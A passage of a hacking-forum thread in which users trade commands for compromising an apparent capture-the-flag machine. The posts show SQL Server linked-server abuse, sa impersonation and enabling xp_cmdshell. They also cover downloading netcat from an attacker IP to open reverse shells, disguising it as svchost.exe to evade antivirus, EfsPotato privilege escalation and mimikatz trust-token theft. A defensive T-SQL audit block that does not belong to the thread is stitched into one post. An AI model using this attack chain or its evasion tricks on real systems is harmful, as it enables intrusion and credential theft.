Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
#61
From mssql this is unintended way. Anybody know intended?
#62
(Jul 14, 2024, 05:03 PM)JAGS_BLAST Wrote:
(Jul 14, 2024, 05:02 PM)a44857437 Wrote: I'm SYSTEM on the (PRIMARY) server, but where are the flags? On the DC probably?

how did u get a shell?

I used mssqlclient, use_link [PRIMARY] and exec_as_login (it is described in the thread somewhere), then enabled xp_cmdshell and ran a reverse shell

(Jul 14, 2024, 05:12 PM)jsvensson Wrote: From mssql this is unintended way. Anybody know intended?

No, but I guess it involves ADFS in some way...
#63
(Jul 14, 2024, 05:16 PM)bl4ckp4nth3r3 Wrote: stuck with mssqlclient - all cmd entered only return in error and kill the impacket client... anyone else have same issues?

there you go
enum_links

use_link [PRIMARY]

use master

exec_as_login sa

enable_xp_cmdshell

xp_cmdshell "whoami"
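For the defensive side of the chain shown in this post (a linked server, impersonation of sa, xp_cmdshell turned on), here is an added T-SQL audit, not from the thread, that a DBA can run on the instance hosting the link to spot all three conditions; the catalog views are standard SQL Server, the 'REVIEW' labels are constructed:

```sql
-- Added audit query (not from the thread). Run on the SQL Server instance that
-- hosts the linked server; a sysadmin context is assumed so all catalog rows are visible.

-- 1) Linked servers and the login mapping each one uses. A link whose remote login
--    is a sysadmin such as sa, or that is open to all local logins, needs review.
SELECT
    s.name                                          AS linked_server,
    s.data_source                                   AS data_source,
    s.is_rpc_out_enabled                            AS rpc_out,        -- needed for EXEC ... AT [link]
    CASE WHEN ll.local_principal_id = 0 THEN '<all logins>'
         ELSE SUSER_NAME(ll.local_principal_id) END AS local_login,
    CASE WHEN ll.uses_self_credential = 1 THEN '<self>'
         ELSE ll.remote_name END                    AS remote_login,
    CASE WHEN ll.remote_name = 'sa'
           OR (ll.local_principal_id = 0 AND ll.uses_self_credential = 0)
         THEN 'REVIEW: privileged or unrestricted link mapping'
         ELSE 'ok' END                              AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name;

-- 2) Who may EXECUTE AS another login? This is what exec_as_login relies on.
--    class 101 = SERVER_PRINCIPAL; state G = GRANT, W = GRANT WITH GRANT OPTION.
SELECT
    grantee.name                                    AS grantee,
    target.name                                     AS can_impersonate,
    CASE WHEN IS_SRVROLEMEMBER('sysadmin', target.name) = 1
         THEN 'REVIEW: impersonation of a sysadmin login'
         ELSE 'ok' END                              AS finding
FROM sys.server_permissions AS p
JOIN sys.server_principals  AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals  AS target  ON target.principal_id  = p.major_id
WHERE p.class = 101
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W');

-- 3) Is xp_cmdshell enabled right now? value_in_use = 1 means yes.
SELECT name, value_in_use,
       CASE WHEN value_in_use = 1 THEN 'REVIEW: xp_cmdshell enabled' ELSE 'ok' END AS finding
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Run the three statements on every instance that appears as a link target as well, since the mapping on the remote side is what decides the context the remote commands execute in.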
#64
xp_cmdshell "echo IWR http://10.10.xx.xx:8000/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile"

xp_cmdshell "%TEMP%\nc.exe 10.10.xx.xx 6666 -e powershell.exe"

although I used my own nc, idk how the one with kali works....
#65
guys after mssql what to do
#66
(Jul 14, 2024, 06:15 PM)shadow_monarch Wrote: where is the root and user flag


C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 161D-1BB7

Directory of C:\Users\Administrator\Desktop

07/10/2024 04:19 AM <DIR> .
07/03/2024 08:55 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 3,519,295,488 bytes free

You're not done
#67
How the hell do you bypass AV to get meterpreter, or is there another way to get NT AUTHORITY?
#68
guys use efs potato to get system

https://github.com/zcgonvh/EfsPotato --> move EfsPotato.cs to the target machine

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

./EfsPotato.exe 'whoami'
#69
(Jul 14, 2024, 07:02 PM)jimmyshoemacher Wrote:
(Jul 14, 2024, 06:38 PM)jsvensson Wrote: How the hell do you bypass AV to get meterpreter, or is there another way to get NT AUTHORITY?

after a lot of trying this worked for me

EXEC xp_cmdshell 'mkdir %TEMP%\mydir';

xp_cmdshell "echo IWR http://10.10.xx.xx/nc64.exe -Outfile %TEMP%\mydir\svchost.exe | powershell -noprofile"
xp_cmdshell "%TEMP%\mydir\svchost.exe 10.10.x.xx 4444 -e powershell.exe"

nc.exe certainly works too. Download the nc.exe to c:\users\public\documents. For some reason Windows Defender doesn't flag nc.exe
#70
(Jul 14, 2024, 05:28 PM)JAGS_BLAST Wrote:
(Jul 14, 2024, 05:14 PM)a44857437 Wrote:
(Jul 14, 2024, 05:03 PM)JAGS_BLAST Wrote:
(Jul 14, 2024, 05:02 PM)a44857437 Wrote: I'm SYSTEM on the (PRIMARY) server, but where are the flags? On the DC probably?

how did u get a shell?

I used mssqlclient, use_link [PRIMARY] and exec_as_login (it is described in the thread somewhere), then enabled xp_cmdshell and ran a reverse shell

(Jul 14, 2024, 05:12 PM)jsvensson Wrote: From mssql this is unintended way. Anybody know intended?

No, but I guess it involves ADFS in some way...

what did u run to get the reverse shell tho cuz everything i have tried either gets blocked or just doesn't work

I cobbled together a powershell rev shell where I masked a number of calls and modules with '*' so they are not really visible to AV anymore

(Jul 14, 2024, 06:15 PM)shadow_monarch Wrote: where is the root and user flag


C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 161D-1BB7

Directory of C:\Users\Administrator\Desktop

07/10/2024 04:19 AM <DIR> .
07/03/2024 08:55 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 3,519,295,488 bytes free

If you got here through the rev shell via mssql server, you're on the PRIMARY machine (part of corp.ghost.htb). The flags are on dc01; you have to abuse the trust and steal the trust token with mimikatz